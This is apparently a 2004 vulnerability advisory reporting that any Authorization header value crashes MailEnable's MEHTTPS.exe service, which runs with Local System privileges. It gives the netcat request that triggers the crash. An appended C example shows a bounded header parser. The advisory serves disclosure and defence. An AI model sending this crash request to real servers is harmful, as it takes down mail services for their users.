MailEnable HTTPMail Remote Authorization Header Overflow
=========================================================

"MailEnable's Messaging Services Platform is a powerful and scalable hosted messaging platform for the Microsoft Windows platform. All the elements of a professional and high performance mail server have been integrated into MailEnable with all the difficult and tedious aspects sheltered as advanced configuration options."

Exploiting:
===========

Netcat localhost 8080

GET / HTTP/1.0
Authorization: X

Problem:
========

It seems that any value following the Authorization header field will crash the service (MEHTTPS.exe).
MEHTTPS.exe runs as a Windows service with "Local System" account privileges!

Version:
========

Mailweb Professional 1.18 with latest hotfix (http://mailenable.com/hotfix/MEHTTPS.zip)
Other versions may also be affected.

Vendor:
=======

http://www.mailenable.com/

Vendor-Status:
==============

Informed

Discovered:
===========

14.05.2004

www.oliverkarow.de
www.oliverkarow.de/research/MailWebHTTPAuthCrash.txt
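The advisory names the bug class (an overflow while handling the Authorization header) but not the faulty code. The following is an added, hypothetical illustration of how a request-header parser avoids that class of defect; it is not MailEnable's code, and MAX_AUTH_LEN, the result enum and the sample requests are constructed for this example.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Hypothetical bounded parser for the Authorization header, added as an
 * illustration of the bug class in the advisory. Not MailEnable's code. */
#define MAX_AUTH_LEN 256

enum auth_result { AUTH_ABSENT = 0, AUTH_OK = 1, AUTH_TOO_LONG = 2, AUTH_MALFORMED = 3 };

/* Scan CRLF-separated request headers for "Authorization:" and copy its value
 * into out (capacity out_len). Over-length values are rejected up front rather
 * than copied into a fixed buffer, which is the unchecked step behind an overflow. */
enum auth_result parse_authorization(const char *request, char *out, size_t out_len)
{
    const char *key = "Authorization:";
    const char *line = request;

    while (line && *line) {
        const char *eol = strstr(line, "\r\n");
        size_t line_len = eol ? (size_t)(eol - line) : strlen(line);

        if (line_len >= strlen(key) && strncasecmp(line, key, strlen(key)) == 0) {
            const char *val = line + strlen(key);
            const char *end = line + line_len;
            while (val < end && (*val == ' ' || *val == '\t')) val++;  /* skip LWS */
            if (val == end) return AUTH_MALFORMED;           /* header present, no value */
            size_t val_len = (size_t)(end - val);
            if (val_len >= out_len) return AUTH_TOO_LONG;    /* would not fit, refuse it */
            memcpy(out, val, val_len);
            out[val_len] = '\0';
            return AUTH_OK;
        }
        line = eol ? eol + 2 : NULL;
    }
    return AUTH_ABSENT;
}

/* Constructed sample: the one-byte value from the advisory's request. */
int check_short_value(void)
{
    char buf[MAX_AUTH_LEN];
    const char *req = "GET / HTTP/1.0\r\nAuthorization: X\r\n\r\n";
    return parse_authorization(req, buf, sizeof buf) == AUTH_OK && strcmp(buf, "X") == 0;
}

/* Constructed sample: a 399-byte value, larger than the destination buffer. */
int check_long_value(void)
{
    char buf[MAX_AUTH_LEN], value[400], req[600];
    memset(value, 'A', sizeof value - 1);
    value[sizeof value - 1] = '\0';
    snprintf(req, sizeof req, "GET / HTTP/1.0\r\nAuthorization: %s\r\n\r\n", value);
    return parse_authorization(req, buf, sizeof buf) == AUTH_TOO_LONG;
}
```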